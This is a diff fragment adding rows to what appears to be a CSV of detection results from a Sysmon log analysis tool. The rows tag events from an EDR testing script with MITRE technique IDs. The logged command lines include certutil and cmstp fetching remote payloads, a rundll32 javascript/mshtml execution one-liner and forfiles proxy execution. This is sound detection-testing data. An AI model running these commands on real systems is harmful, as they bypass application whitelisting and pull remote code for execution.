+    <Data Name=""Image"">C:\Windows\System32\forfiles.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">ForFiles - Executes a command on selected files</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6666-5D3F-0000-001016F78D00</Data>
+    <Data Name=""ParentProcessId"">2244</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1553029201.518992,2019-03-20T01:00:01.518992+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:58:44.237867Z"">
+    </TimeCreated>
+    <EventRecordID>1966501</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:58:44.187</Data>
+    <Data Name=""ProcessGuid"">365ABB72-5804-5C91-0000-001044DE0900</Data>
+    <Data Name=""ProcessId"">2456</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">whoami</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-528D-5C91-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-57FB-5C91-0000-00104FD40900</Data>
+    <Data Name=""ParentProcessId"">2128</Data>
+    <Data Name=""ParentImage"">C:\osk.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;c:\osk.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436070.258082,2019-07-30T01:34:30.258082+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:30.237042Z"">
+    </TimeCreated>
+    <EventRecordID>4986</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:30.221</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6666-5D3F-0000-001016F78D00</Data>
+    <Data Name=""ProcessId"">2244</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436065.269897,2019-07-30T01:34:25.269897+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:25.202954Z"">
+    </TimeCreated>
+    <EventRecordID>4983</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:25.180</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6661-5D3F-0000-00107AB88D00</Data>
+    <Data Name=""ProcessId"">6428</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1564436065.202954,2019-07-30T01:34:25.202954+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname (  ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:21.867545Z"">
+    </TimeCreated>
+    <EventRecordID>4982</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Suspicious NetCon</Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:20.735</Data>
+    <Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010E37B8D00</Data>
+    <Data Name=""ProcessId"">4520</Data>
+    <Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
+    <Data Name=""SourcePort"">49833</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">151.101.0.133</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">443</Data>
+    <Data Name=""DestinationPortName"">https</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1564436061.867545,2019-07-30T01:34:21.867545+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname (  ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:21.867100Z"">
+    </TimeCreated>
+    <EventRecordID>4981</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Suspicious NetCon</Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:20.619</Data>
+    <Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010E37B8D00</Data>
+    <Data Name=""ProcessId"">4520</Data>
+    <Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
+    <Data Name=""SourcePort"">49832</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">151.101.0.133</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">443</Data>
+    <Data Name=""DestinationPortName"">https</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe  -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1  )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:20.459065Z"">
+    </TimeCreated>
+    <EventRecordID>4980</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:20.410</Data>
+    <Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010E37B8D00</Data>
+    <Data Name=""ProcessId"">4520</Data>
+    <Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">CertUtil.exe</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">certutil.exe  -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-665C-5D3F-0000-0010096B8D00</Data>
+    <Data Name=""ParentProcessId"">7088</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1  </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe  -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:20.459065Z"">
+    </TimeCreated>
+    <EventRecordID>4980</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:20.410</Data>
+    <Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010E37B8D00</Data>
+    <Data Name=""ProcessId"">4520</Data>
+    <Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">CertUtil.exe</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">certutil.exe  -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-665C-5D3F-0000-0010096B8D00</Data>
+    <Data Name=""ParentProcessId"">7088</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1  </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436060.262273,2019-07-30T01:34:20.262273+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:20.238305Z"">
+    </TimeCreated>
+    <EventRecordID>4978</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:20.134</Data>
+    <Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010096B8D00</Data>
+    <Data Name=""ProcessId"">7088</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);})",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:15.658168Z"">
+    </TimeCreated>
+    <EventRecordID>4977</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:15.502</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6657-5D3F-0000-001011298D00</Data>
+    <Data Name=""ProcessId"">1004</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6657-5D3F-0000-001029198D00</Data>
+    <Data Name=""ParentProcessId"">1808</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:15.658168Z"">
+    </TimeCreated>
+    <EventRecordID>4977</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
